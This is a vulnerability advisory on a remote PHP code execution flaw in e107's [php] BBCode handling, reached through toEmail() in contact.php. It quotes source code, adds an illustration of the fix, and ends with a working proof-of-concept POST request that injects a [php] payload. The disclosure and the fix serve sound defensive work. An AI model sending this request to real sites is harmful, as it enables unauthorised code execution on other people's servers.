e107 BBCode arbitrary PHP code execution vulnerability - vulnerability alert - the black bar safety net

ID MYHACK58:62201026996
Type myhack58
Reporter Anonymous
Modified 2010-05-22T00:00:00


e107 is a content management system written in PHP.

In e107, the [php] bbcode allows execution of arbitrary PHP code. Because this feature is dangerous, e107's default configuration denies all users access to this bbcode; the administrator can enable it on demand for a specific user class.

e107 does not perform the access control check inside the BBCode parser itself, but in some of the external functions that call the parser, for example:

function post_toHTML($text, $modifier = true, $extra = "")
{
    global $pref;   // e107 preference array; $pref['php_bbcode'] holds the user class allowed to use [php]
    ...

    // If user is not allowed to use [php], change the tag to entities
    if (!check_class($pref['php_bbcode'])) {
        $text = preg_replace("#\[(php)#i", "&#91;\\1", $text);
    }

    return ($modifier ? $this->toHTML($text, true, $extra) : $text);
}

As this code shows, the toHTML() method itself does not perform the [php] access check, because the check has already been done by the caller. This means that user input must never reach toHTML() directly; otherwise it may lead to remote PHP code execution.

However, in some other places user input can reach toHTML(), for example in the toEmail() method:

function toEmail($text, $posted = "", $mods = "parse_sc, no_make_clickable")
{
    if ($posted === TRUE && MAGIC_QUOTES_GPC) {
        $text = stripslashes($text);
    }

    $text = (strtolower($mods) != "rawtext") ? $this->replaceConstants($text, "full") : $text;
    $text = $this->toHTML($text, TRUE, $mods);   // no [php] access check on this path
    return $text;
}

If toEmail() is called on user input, this can lead to remote PHP code execution. One example of this is the contact.php file:

$error = "";

$sender_name = $tp->toEmail($_POST['author_name'], TRUE, "rawtext");
$sender      = check_email($_POST['email_send']);
$subject     = $tp->toEmail($_POST['subject'], TRUE, "rawtext");
$body        = $tp->toEmail($_POST['body'], TRUE, "rawtext");

A POST request to contact.php can therefore make the server execute arbitrary PHP code.
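As an added illustration (not e107's own code), the following standalone PHP script models the layout described above and the fix of moving the [php] check into the sink, toHTML(), so that toEmail() and every other caller inherit it. check_class(), $pref['php_bbcode'] and the user class names are stand-ins for e107's, and nothing here evaluates PHP; the dangerous branch is only marked in the output.

```php
<?php
// Added example, not e107's own code: a model of the advisory's design flaw.
// check_class(), $pref['php_bbcode'] and the class names are stand-ins;
// the branch that would execute PHP only marks the output, it does not eval.
$pref = ['php_bbcode' => 'admin'];   // the only user class allowed to use [php]

function check_class($allowed, $user_class) {
    return $user_class === $allowed;
}

// Same neutralisation post_toHTML() applies: turn "[php" into "&#91;php" so
// the parser no longer recognises the tag (the closing tag is covered too).
function neutralise_php_bbcode($text) {
    return preg_replace('#\[(/?php)#i', '&#91;\\1', $text);
}

class Parser {
    private $user_class;
    public function __construct($user_class) {
        $this->user_class = $user_class;
    }

    // Vulnerable layout: the sink trusts its callers to have run the check.
    public function toHTML_unchecked($text) {
        return preg_replace_callback('#\[php\](.*?)\[/php\]#is', function ($m) {
            return '{{php-would-execute: ' . htmlspecialchars($m[1]) . '}}';
        }, $text);
    }

    // Fixed layout: the check lives in the sink, so toEmail() and any other
    // caller inherit it instead of each having to remember it.
    public function toHTML($text) {
        global $pref;
        if (!check_class($pref['php_bbcode'], $this->user_class)) {
            $text = neutralise_php_bbcode($text);
        }
        return $this->toHTML_unchecked($text);
    }

    public function toEmail($text) {   // mirrors e107's toEmail(): no check of its own
        return $this->toHTML(stripslashes($text));
    }
}

$payload = '[php]phpinfo();[/php]';   // constructed sample input
foreach (['guest', 'admin'] as $class) {
    $out = (new Parser($class))->toEmail($payload);
    $executed = strpos($out, 'php-would-execute') !== false;
    echo str_pad($class, 6), ' -> ', $executed ? 'EXECUTES' : 'neutralised', ': ', $out, "\n";
}
```

With the check in the sink, the guest path prints the neutralised tag while only the admin class reaches the marked branch, regardless of which caller handed the input in.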

Test code:

POST /contact.php HTTP/1.1
Host: xxxx
User-Agent: e107 0.7.20 Remote Code Execution Exploit
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

send-contactus=1&author_name=[php]phpinfo()%3bdie()%3b[/php]&

The vendor has not yet released a patch or upgrade. Users of this software are advised to follow the vendor's home page to obtain the latest version: